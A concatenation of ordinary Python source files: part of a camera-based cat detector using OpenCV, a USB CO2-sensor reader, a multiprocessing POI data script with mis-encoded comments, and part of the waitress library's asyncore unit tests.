'h':h,
"is_cat": is_cat
}
)
except IndexError:
pass
return img, is_cat, data
#classIds, confs, bbox = net.detect(img,confThreshold=thres,nmsThreshold=nms)
#print(classIds,bbox)
# if len(objects) == 0: objects = classNames
# objectInfo =[]
# if len(classIds) != 0:
# for classId, confidence,box in zip(classIds.flatten(),confs.flatten(),bbox):
# className = classNames[classId - 1]
# if className in objects:
# objectInfo.append([box,className])
# if (draw):
# cv2.rectangle(img,box,color=(0,255,0),thickness=2)
# cv2.putText(img,classNames[classId-1].upper(),(box[0]+10,box[1]+30),
# cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)
# cv2.putText(img,str(round(confidence*100,2)),(box[0]+200,box[1]+30),
# cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)
# return img,objectInfo
frameCounter = 0
resettimer = 1
frames = 0
catCounter = 1
cap = object
#v = "/z/camera/2021-Oct-Night.mkv"
#v = "/z/camera/uploads/c3/2021/10/13/.C3_01_20211013205816-1280x960.mkv"
#v = "/z/camera/uploads/c3/2021/10/12/.C3_01_20211012204541-1280x960.mkv"
#v = "/z/camera/C3_01_20211016002548-0000-0800-1280x960.mkv"
#v = "/z/camera/C3/C3-2021-10-17-0000-0800.mkv"
videos = queue.Queue()
# v = {
# "videoFile": "/z/camera/2021-Oct-Night-fullrez.mkv",
# "comment" : ""
# }
# videos.append(v)
play = ( "C3-2021-10-20-0000-0800.mkv",
"C3-2021-10-20-0801-1600.mkv",
"C3-2021-10-20-1601-2359.mkv",
"C3-2021-10-21-0000-0800.mkv",
"C3-2021-10-21-0801-1600.mkv",
"C3-2021-10-21-1601-2359.mkv",
"C3-2021-10-22-0000-0800.mkv",
"C3-2021-10-22-0801-1600.mkv",
"C3-2021-10-22-1601-2359.mkv",
"C3-2021-10-23-0000-0800.mkv",
"C3-2021-10-23-0801-1600.mkv",
"C3-2021-10-23-1601-2359.mkv",
)
#
#
for p in play:
v = {
"videoFile": "/z/camera/C3/" + p,
"comment" : ""
}
videos.put(v)
# v = {
# "videoFile": "/z/camera/uploads/c3/2021/10/17/C3_01_20211017235405.mp4",
# "comment" : "Olive approaching, 1:55"
# }
# videos.append(v)
# v = {
# "videoFile": "/z/camera/uploads/c3/2021/10/17/C3_01_20211017220622.mp4",
# "comment" : "Domion approaching, 1:02"
# }
# videos.append(v)
# v = {
# "videoFile": "/z/camera/uploads/c3/2021/10/17/C3_01_20211017225239.mp4",
# "comment" : "Domion returns, approaching from left, eating 5:22"
# }
# videos.append(v)
# v = {
# "videoFile": "/z/camera/C3/C3-2021-10-23-1601-2359.mkv",
# "comment" : ""
# }
# videos.append(v)
#
#cap = cv2.VideoCapture(v)
# cap = cv2.VideoCapture(v, cv2.CAP_FFMPEG)
#cap = acapture.open(v) # Camera 0, /dev/video0
# (major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')
# if int(major_ver) < 3 :
# fps = cap.get(cv2.cv.CV_CAP_PROP_FPS)
# print ("Frames per second using video.get(cv2.cv.CV_CAP_PROP_FPS): {0}".format(fps))
# else :
# fps = cap.get(cv2.CAP_PROP_FPS)
# print ("Frames per second using video.get(cv2.CAP_PROP_FPS) : {0}".format(fps))
#
framesIn = queue.Queue(100)
framesOut = queue.Queue(100)
ready = queue.Queue(1)
def openVideoStream():
videoObject = videos.get()
v = videoObject['videoFile']
if re.search("^rtsp", v):
os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "rtsp_transport;udp"
print("This is rtsp stream.")
else:
vid = ffmpeg.probe(v)
for stream in vid['streams']:
print ("\n\nOpening video %s code:[%s][%s] " % ( v,stream['codec_type'], stream['codec_name']))
if stream['codec_type'] == "video":
if stream['codec_name'] == "h264":
os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "video_codec;h264_cuvid|hwaccel;cuda|hwaccel_output_format;cuda"
elif stream['codec_name'] == "hevc":
os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "video_codec;hevc_cuvid|hwaccel;cuda|hwaccel_output_format;cuda"
elif stream['codec_name'] == "h265":
os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "video_codec;hevc_cuvid|hwaccel;cuda|hwaccel_output_format;cuda"
else:
#os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = ""
os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "rtsp_transport;udp"
cap = cv2.VideoCapture(v,cv2.CAP_FFMPEG)
return cap
def queueFrames():
failures = 0
cap = openVideoStream()
while True:
success, img = cap.read()
if success:
framesIn.put(img)
else:
failures+=1
if failures > 30:
cap.release()
try:
cap = openVideoStream()
failures=0
except:
sys.exit(0)
# if framesIn.qsize() < 10:
# framesIn.put(img)
# else:
# dropFrame = framesIn.get()
# print( "%8s %12s" % ( ' ', 'drop frame' ) )
# #print( "%8d %s" % ( 0, "dropping frame" ))
def mainLoop():
labels = {
'frame': "frame",
'class': "class",
'conf': "conf",
'x':"x",
'y':"y",
'w':"w",
'h':"h",
"catCounter": "consecCatFr",
"catTimer": "sec/meow"
}
print( "\n\n%(frame)8s %(catCounter)12s %(catTimer)14s %(class)16s %(conf)8s %(x)6s %(y)6s %(w)6s %(h)6s\n" % labels )
frameCounter = 0
lineCounter = 0
catCounter = 1
objectCounter = {}
objectCounterRef = {}
objectCounterLastFrame = {}
objectCounterQ = {}
for c in classes:
objectCounter[c] = 0
objectCounterLastFrame[c] = 0
objectCounterRef[c] = 0
objectCounterQ[c] = []
modulo = 10
catTimer = time.time() - modulo
data = {}
net = cv2.dnn.readNetFromDarknet(cw[pkgVer]["configPath"],cw[pkgVer]["weightsPath"]);
net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)
while True:
for c in classes:
objectCounterRef[c] = 0
is_cat = False
frameCounter += 1
img = framesIn.get()
img, is_cat, data = getObjects(img,net,0.45,0.2, frameCounter=frameCounter)
framesOut.put(img)
if is_cat:
catCounter+=1
else:
catCounter=1
for d in data:
d['catTimer'] = time.time() - catTimer
c = d["class"]
d['catCounter'] = catCounter
objectCounterRef[c] += 1
frameGap = d['frame'] - objectCounterLastFrame[c]
if frameGap == 0 and len(objectCounterQ[c]) < 11:
pp.pprint( objectCounterQ[c] )
if frameGap > 0 and frameGap < 11:
objectCounterQ[c].append(d['frame'])
elif frameGap > 10:
objectCounterQ[c] = []
objectCounterLastFrame[c] = d['frame']
if lineCounter % 25 == 0:
print( "\n\n%(frame)8s %(catCounter)12s %(catTimer)14s %(class)16s %(conf)8s %(x)6s %(y)6s %(w)6s %(h)6s\n" % labels )
print( "%(frame)8d %(catCounter)12d %(catTimer)14d %(class)16s %(conf)8s %(x)6d %(y)6d %(w)6d %(h)6d" % d )
#print( "%8s %12s %6d %6d %16s" % ( " ", " ", frameGap, len(objectCounterQ[c]), c ) )
lineCounter+=1
if (catCounter) % modulo == 0:
end = time.time()
seconds = end - catTimer
if seconds > 10:
catTimer = time.time()
pygame.mixer.music.play()
# for c in classes:
# if objectCounterRef[c] == 0:
# objectCounter[c] = 0
# else:
# objectCounter[c] += objectCounterRef[c]
def displayImage():
cv2.namedWindow("Output", cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO | cv2.WINDOW_GUI_EXPANDED)
while True:
img = framesOut.get()
cv2.imshow("Output",img)
cv2.waitKey(1)
def sigterm_handler(_signo, _stack_frame):
# Raises SystemExit(0):
print("sigterm_handler")
sys.exit(0)
signal.signal(signal.SIGTERM, sigterm_handler)
if __name__ == "__main__":
mainThread = threading.Thread(target=mainLoop, daemon=True)
mainThread.start()
displayImageThread = threading.Thread(target=displayImage, daemon=True)
displayImageThread.start()
queueFrames = threading.Thread(target=queueFrames, daemon=True)
queueFrames.start()
while True:
try:
#print( "%8s %12s %14s " % ( "main", framesIn.qsize(), framesOut.qsize() ) )
time.sleep(2)
except KeyboardInterrupt:
sys.exit(0)
#out = cv2.VideoWriter('/home/camera/output.mkv',cv2.VideoWriter_fourcc('H','E','V','C'), 30, (1024, 768))
# cap = cv2.VideoCapture("/z/camera/uploads/c3/2021/09/30/.C3_01_20210930201654-1280x960.mkv")
# cap = cv2.VideoCapture("/z/camera/C3/C3-2021-10-02-1601-2359.mkv")
# cap = cv2.VideoCapture("/z/camera/C3/C3-2021-10-02-0000-0800.mkv")
# VID_PATH,cv2.CAP_FFMPEG
#cap.set(3,640)
#cap.set(4,480)
#cap.set(10,70)
#resize = ResizeWithAspectRatio(img, width=1280)
#result, objectInfo = getObjects(img,0.45,0.2, objects=['cat',"bowl"])
#objectInfo(print)
# cv2.imshow("Output",img)
#out.write(img)
# end = time.time()
# seconds = end - start
# frames=frames+1
# if seconds > 5 :
# print ("Time taken : {0} seconds".format(seconds))
# fps = frames / seconds
# print("Estimated frames per second : {0}".format(fps))
# resettimer = 1
# frames = 0
#v = "/z/camera/C3/C3-2021-10-08-1601-2359.mkv"
#v = "/z/camera/uploads/c3/2021/09/30/.C3_01_20210930201654-1280x960.mkv"
#cap = cv2.VideoCapture("/z/camera/uploads/c3/2021/09/30/.C3_01_20210930201654-1280x960.mkv", cv2.CAP_FFMPEG)
#v = "/z/camera/C3-2021-Sept.mkv"
#v ="/z/camera/C3-2021-Sept-0000.mkv"
#v = "/z/camera/C3-2021-10-09.mkv"
#v = "/z/camera/C3/C3-2021-10-11-0000-0800.mkv"
#v ="/z/camera/C3/C3-2021-10-12-0000-0800.mkv"
#v ="/z/camera/C3/C3-2021-10-13-0000-0800.mkv"
#v = "/z/camera/C3/C3-2021-10-14-1601-2359.mkv"
#v = "/z/camera/C1-2021-10-Night.mkv"
#v = "/z/camera/C4/C4-2021-10-16-0000-0800.mkv"
#v = "/z/camera/2021-Oct-Night.mkv"
#v = "/z/camera/C3/C3-2021-10-16-0000-0800.mkv"
#v = "/z/camera/C3/C3-2021-10-15-0000-0800.mkv"
#v = "/z/camera/C3/C3-2021-10-14-0000-0800.mkv"
#v = "/z/camera/C3_01_20211016002548-0000-0800-1280x960.mkv"
#v = "/z/camera/uploads/c4/2021/10/15/.C4_01_20211015194005-1280x960.mkv"
|
CO2Meter.py | import sys
import fcntl
import threading
import weakref
CO2METER_CO2 = 0x50
CO2METER_TEMP = 0x42
CO2METER_HUM = 0x44
HIDIOCSFEATURE_9 = 0xC0094806
def _co2_worker(weak_self):
while True:
self = weak_self()
if self is None:
break
self._read_data()
if not self._running:
break
del self
class CO2Meter:
_key = [0xc4, 0xc6, 0xc0, 0x92, 0x40, 0x23, 0xdc, 0x96]
_device = ""
_values = {}
_file = ""
_running = True
_callback = None
def __init__(self, device="/dev/hidraw0", callback=None):
self._device = device
self._callback = callback
self._file = open(device, "a+b", 0)
if sys.version_info >= (3,):
set_report = [0] + self._key
fcntl.ioctl(self._file, HIDIOCSFEATURE_9, bytearray(set_report))
else:
set_report_str = "\x00" + "".join(chr(e) for e in self._key)
fcntl.ioctl(self._file, HIDIOCSFEATURE_9, set_report_str)
thread = threading.Thread(target=_co2_worker, args=(weakref.ref(self),))
thread.daemon = True
thread.start()
def _read_data(self):
try:
result = self._file.read(8)
if sys.version_info >= (3,):
data = list(result)
else:
data = list(ord(e) for e in result)
decrypted = self._decrypt(data)
if decrypted[4] != 0x0d or (sum(decrypted[:3]) & 0xff) != decrypted[3]:
print(self._hd(data), " => ", self._hd(decrypted), "Checksum error")
else:
operation = decrypted[0]
val = decrypted[1] << 8 | decrypted[2]
self._values[operation] = val
if self._callback is not None:
if operation == CO2METER_CO2:
self._callback(sensor=operation, value=val)
elif operation == CO2METER_TEMP:
self._callback(sensor=operation,
value=round(val / 16.0 - 273.1, 1))
elif operation == CO2METER_HUM:
self._callback(sensor=operation, value=round(val / 100.0, 1))
except:
self._running = False
def _decrypt(self, data):
cstate = [0x48, 0x74, 0x65, 0x6D, 0x70, 0x39, 0x39, 0x65]
shuffle = [2, 4, 0, 7, 1, 6, 5, 3]
phase1 = [0] * 8
for i, j in enumerate(shuffle):
phase1[j] = data[i]
phase2 = [0] * 8
for i in range(8):
phase2[i] = phase1[i] ^ self._key[i]
phase3 = [0] * 8
for i in range(8):
phase3[i] = ((phase2[i] >> 3) | (phase2[(i-1+8)%8] << 5)) & 0xff
ctmp = [0] * 8
for i in range(8):
ctmp[i] = ((cstate[i] >> 4) | (cstate[i]<<4)) & 0xff
out = [0] * 8
for i in range(8):
out[i] = (0x100 + phase3[i] - ctmp[i]) & 0xff
return out
@staticmethod
def _hd(data):
return " ".join("%02X" % e for e in data)
def get_co2(self):
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_CO2 in self._values:
result = {'co2': self._values[CO2METER_CO2]}
return result
def get_temperature(self):
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_TEMP in self._values:
result = {'temperature': (self._values[CO2METER_TEMP]/16.0-273.15)}
return result
def get_humidity(self): # not implemented by all devices
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_HUM in self._values:
result = {'humidity': (self._values[CO2METER_HUM]/100.0)}
return result
def get_data(self):
result = {}
result.update(self.get_co2())
result.update(self.get_temperature())
result.update(self.get_humidity())
return result
|
uniPOIRelatedEdge.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
import sys
import time
import logging
import getopt
from multiprocessing import Process
from util.UniPOIEdgeBasic import UniPOIEdgeBasic
from util.UniAdmPOIEdge import UniAdmPOIEdge
from util.dbopts import connectMongo
def processTask(type, x, city, directory, inum, poiMap, stdoutdir):
PROP = {
'INDEX': x,
'CITY': city,
'DIRECTORY': directory,
'INUM': inum,
'poiMap': poiMap,
'stdoutdir': stdoutdir,
'edgeType': type
}
if type == 'pp':
task = UniPOIEdgeBasic(PROP)
elif type == 'ap' or type == 'pa':
task = UniAdmPOIEdge(PROP)
task.run()
def usage():
"""
ไฝฟ็จ่ฏดๆๅฝๆฐ
"""
print "python run.py -d /datasets -t pp -i 86"
def main(argv):
"""
ไธปๅ
ฅๅฃๅฝๆฐ
:param argv: city ่กจ็คบๅๅธ๏ผ directory ่กจ็คบ่ทฏๅพ๏ผ inum ่กจ็คบ่พๅ
ฅๆไปถๆปๆฐ๏ผ onum ่กจ็คบ่พๅบๆไปถๆปๆฐ๏ผ jnum ่กจ็คบๅค็่ฟ็จๆฐ๏ผ้ๅธธๅ onum ไธ่ด๏ผ subopath ไธบ็ปๆๅญๅจ็ๅญ็ฎๅฝๅๅญ
"""
try:
argsArray = ["help", "city=", 'directory=', 'inum=', 'jnum=', 'type=']
opts, args = getopt.getopt(argv, "hc:d:i:j:t:", argsArray)
except getopt.GetoptError as err:
print str(err)
usage()
sys.exit(2)
city, directory, inum, jnum, stdoutdir = 'beijing', '/home/tao.jiang/datasets/JingJinJi/records', 86, 20, 'bj-newvis-sg'
type = 'pp'
for opt, arg in opts:
if opt == '-h':
usage()
sys.exit()
elif opt in ("-c", "--city"):
city = arg
elif opt in ("-d", "--directory"):
directory = arg
elif opt in ('-i', '--inum'):
inum = int(arg)
elif opt in ('-j', '--jnum'):
jnum = int(arg)
elif opt in ('-t', '--type'):
type = arg
STARTTIME = time.time()
print "Start approach at %s" % STARTTIME
# ๅบๅฎ็ฝๆ ผๆปๆฐ
poiMap = {}
conn, db = connectMongo('stvis')
plist = list(db['grids'].find({}, {
'pid': 1,
'nid': 1
}))
conn.close()
print "POI List length: %d" % len(plist)
for each in plist:
poiMap[each['nid']] = each['pid']
# plist = None
# @ๅค่ฟ็จ่ฟ่ก็จๅบ START
jobs = []
for x in xrange(0, jnum):
jobs.append(Process(target=processTask, args=(type, x, city, directory, inum, poiMap, stdoutdir)))
jobs[x].start()
for job in jobs:
job.join()
# ๆไปถ่ฟไบๅบๅคง๏ผๆ
ไธๅๅๅนถๅค็
# mergeMultiProcessMatFiles(directory, stdoutdir, jnum)
# @ๅค่ฟ็จ่ฟ่ก็จๅบ END
print "END TIME: %s" % time.time()
if __name__ == '__main__':
logging.basicConfig(filename='logger-unipoirelatededge.log', level=logging.DEBUG)
main(sys.argv[1:]) |
test_wasyncore.py | import _thread as thread
import contextlib
import errno
import functools
import gc
from io import BytesIO
import os
import re
import select
import socket
import struct
import sys
import threading
import time
import unittest
import warnings
from waitress import compat, wasyncore as asyncore
TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, "AF_UNIX")
HOST = "localhost"
HOSTv4 = "127.0.0.1"
HOSTv6 = "::1"
# Filename used for testing
if os.name == "java": # pragma: no cover
# Jython disallows @ in module names
TESTFN = "$test"
else:
TESTFN = "@test"
TESTFN = "{}_{}_tmp".format(TESTFN, os.getpid())
class DummyLogger: # pragma: no cover
def __init__(self):
self.messages = []
def log(self, severity, message):
self.messages.append((severity, message))
class WarningsRecorder: # pragma: no cover
"""Convenience wrapper for the warnings list returned on
entry to the warnings.catch_warnings() context manager.
"""
def __init__(self, warnings_list):
self._warnings = warnings_list
self._last = 0
@property
def warnings(self):
return self._warnings[self._last :]
def reset(self):
self._last = len(self._warnings)
def _filterwarnings(filters, quiet=False): # pragma: no cover
"""Catch the warnings, then check if all the expected
warnings have been raised and re-raise unexpected warnings.
If 'quiet' is True, only re-raise the unexpected warnings.
"""
# Clear the warning registry of the calling module
# in order to re-raise the warnings.
frame = sys._getframe(2)
registry = frame.f_globals.get("__warningregistry__")
if registry:
registry.clear()
with warnings.catch_warnings(record=True) as w:
# Set filter "always" to record all warnings. Because
# test_warnings swap the module, we need to look up in
# the sys.modules dictionary.
sys.modules["warnings"].simplefilter("always")
yield WarningsRecorder(w)
# Filter the recorded warnings
reraise = list(w)
missing = []
for msg, cat in filters:
seen = False
for w in reraise[:]:
warning = w.message
# Filter out the matching messages
if re.match(msg, str(warning), re.I) and issubclass(warning.__class__, cat):
seen = True
reraise.remove(w)
if not seen and not quiet:
# This filter caught nothing
missing.append((msg, cat.__name__))
if reraise:
raise AssertionError("unhandled warning %s" % reraise[0])
if missing:
raise AssertionError("filter (%r, %s) did not catch any warning" % missing[0])
@contextlib.contextmanager
def check_warnings(*filters, **kwargs): # pragma: no cover
"""Context manager to silence warnings.
Accept 2-tuples as positional arguments:
("message regexp", WarningCategory)
Optional argument:
- if 'quiet' is True, it does not fail if a filter catches nothing
(default True without argument,
default False if some filters are defined)
Without argument, it defaults to:
check_warnings(("", Warning), quiet=True)
"""
quiet = kwargs.get("quiet")
if not filters:
filters = (("", Warning),)
# Preserve backward compatibility
if quiet is None:
quiet = True
return _filterwarnings(filters, quiet)
def gc_collect(): # pragma: no cover
"""Force as many objects as possible to be collected.
In non-CPython implementations of Python, this is needed because timely
deallocation is not guaranteed by the garbage collector. (Even in CPython
this can be the case in case of reference cycles.) This means that __del__
methods may be called later than expected and weakrefs may remain alive for
longer than expected. This function tries its best to force all garbage
objects to disappear.
"""
gc.collect()
if sys.platform.startswith("java"):
time.sleep(0.1)
gc.collect()
gc.collect()
def threading_setup(): # pragma: no cover
return (thread._count(), None)
def threading_cleanup(*original_values): # pragma: no cover
global environment_altered
_MAX_COUNT = 100
for count in range(_MAX_COUNT):
values = (thread._count(), None)
if values == original_values:
break
if not count:
# Display a warning at the first iteration
environment_altered = True
sys.stderr.write(
"Warning -- threading_cleanup() failed to cleanup "
"%s threads" % (values[0] - original_values[0])
)
sys.stderr.flush()
values = None
time.sleep(0.01)
gc_collect()
def reap_threads(func): # pragma: no cover
"""Use this function when threads are being used. This will
ensure that the threads are cleaned up even when the test fails.
"""
@functools.wraps(func)
def decorator(*args):
key = threading_setup()
try:
return func(*args)
finally:
threading_cleanup(*key)
return decorator
def join_thread(thread, timeout=30.0): # pragma: no cover
"""Join a thread. Raise an AssertionError if the thread is still alive
after timeout seconds.
"""
thread.join(timeout)
if thread.is_alive():
msg = "failed to join the thread in %.1f seconds" % timeout
raise AssertionError(msg)
def bind_port(sock, host=HOST): # pragma: no cover
"""Bind the socket to a free port and return the port number. Relies on
ephemeral ports in order to ensure we are using an unbound port. This is
important as many tests may be running simultaneously, especially in a
buildbot environment. This method raises an exception if the sock.family
is AF_INET and sock.type is SOCK_STREAM, *and* the socket has SO_REUSEADDR
or SO_REUSEPORT set on it. Tests should *never* set these socket options
for TCP/IP sockets. The only case for setting these options is testing
multicasting via multiple UDP sockets.
Additionally, if the SO_EXCLUSIVEADDRUSE socket option is available (i.e.
on Windows), it will be set on the socket. This will prevent anyone else
from bind()'ing to our host/port for the duration of the test.
"""
if sock.family == socket.AF_INET and sock.type == socket.SOCK_STREAM:
if hasattr(socket, "SO_REUSEADDR"):
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR) == 1:
raise RuntimeError(
"tests should never set the SO_REUSEADDR "
"socket option on TCP/IP sockets!"
)
if hasattr(socket, "SO_REUSEPORT"):
try:
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT) == 1:
raise RuntimeError(
"tests should never set the SO_REUSEPORT "
"socket option on TCP/IP sockets!"
)
except OSError:
# Python's socket module was compiled using modern headers
# thus defining SO_REUSEPORT but this process is running
# under an older kernel that does not support SO_REUSEPORT.
pass
if hasattr(socket, "SO_EXCLUSIVEADDRUSE"):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
sock.bind((host, 0))
port = sock.getsockname()[1]
return port
@contextlib.contextmanager
def closewrapper(sock): # pragma: no cover
try:
yield sock
finally:
sock.close()
class dummysocket: # pragma: no cover
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
def setblocking(self, yesno):
self.isblocking = yesno
def getpeername(self):
return "peername"
class dummychannel: # pragma: no cover
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy: # pragma: no cover
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv): # pragma no cover
try:
serv.listen(0)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.time()
while n > 0 and time.time() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b"\n", b""))
if b"\n" in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_unix_socket(sock, addr): # pragma: no cover
"""Bind a unix socket, raising SkipTest if PermissionError is raised."""
assert sock.family == socket.AF_UNIX
try:
sock.bind(addr)
except PermissionError:
sock.close()
raise unittest.SkipTest("cannot bind AF_UNIX sockets")
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
unlink(addr)
bind_unix_socket(sock, addr)
else:
sock.bind(addr)
if sys.platform.startswith("win"): # pragma: no cover
def _waitfor(func, pathname, waitall=False):
# Perform the operation
func(pathname)
# Now setup the wait loop
if waitall:
dirname = pathname
else:
dirname, name = os.path.split(pathname)
dirname = dirname or "."
# Check for `pathname` to be removed from the filesystem.
# The exponential backoff of the timeout amounts to a total
# of ~1 second after which the deletion is probably an error
# anyway.
# Testing on an i7@4.3GHz shows that usually only 1 iteration is
# required when contention occurs.
timeout = 0.001
while timeout < 1.0:
# Note we are only testing for the existence of the file(s) in
# the contents of the directory regardless of any security or
# access rights. If we have made it this far, we have sufficient
# permissions to do that much using Python's equivalent of the
# Windows API FindFirstFile.
# Other Windows APIs can fail or give incorrect results when
# dealing with files that are pending deletion.
L = os.listdir(dirname)
if not (L if waitall else name in L):
return
# Increase the timeout and try again
time.sleep(timeout)
timeout *= 2
warnings.warn(
"tests may fail, delete still pending for " + pathname,
RuntimeWarning,
stacklevel=4,
)
def _unlink(filename):
_waitfor(os.unlink, filename)
else:
_unlink = os.unlink
def unlink(filename):
try:
_unlink(filename)
except OSError:
pass
def _is_ipv6_enabled(): # pragma: no cover
"""Check whether IPv6 is enabled on this host."""
if compat.HAS_IPV6:
sock = None
try:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
sock.bind(("::1", 0))
return True
except OSError:
pass
finally:
if sock:
sock.close()
return False
IPV6_ENABLED = _is_ipv6_enabled()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ("read", "expt", "write", "closed", "error_handled")
expected = (
(select.POLLIN, "read"),
(select.POLLPRI, "expt"),
(select.POLLOUT, "write"),
(select.POLLERR, "closed"),
(select.POLLHUP, "closed"),
(select.POLLNVAL, "closed"),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
# def handle_error(self):
# self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr == expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], "test_wasyncore.py")
self.assertEqual(function, "test_compact_traceback")
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, "[%s|%s|%s]" % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), "<waitress.wasyncore.dispatcher at %#x>" % id(d))
def test_log_info(self):
import logging
inst = asyncore.dispatcher(map={})
logger = DummyLogger()
inst.logger = logger
inst.log_info("message", "warning")
self.assertEqual(logger.messages, [(logging.WARN, "message")])
def test_log(self):
import logging
inst = asyncore.dispatcher()
logger = DummyLogger()
inst.logger = logger
inst.log("message")
self.assertEqual(logger.messages, [(logging.DEBUG, "message")])
def test_unhandled(self):
import logging
inst = asyncore.dispatcher()
logger = DummyLogger()
inst.logger = logger
inst.handle_expt()
inst.handle_read()
inst.handle_write()
inst.handle_connect()
expected = [
(logging.WARN, "unhandled incoming priority event"),
(logging.WARN, "unhandled read event"),
(logging.WARN, "unhandled write event"),
(logging.WARN, "unhandled connect event"),
]
self.assertEqual(logger.messages, expected)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, "strerror"):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send): # pragma: no cover
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b"\n")
n = 1000
while d.out_buffer and n > 0: # pragma: no cover
asyncore.poll()
n -= 1
evt.wait()
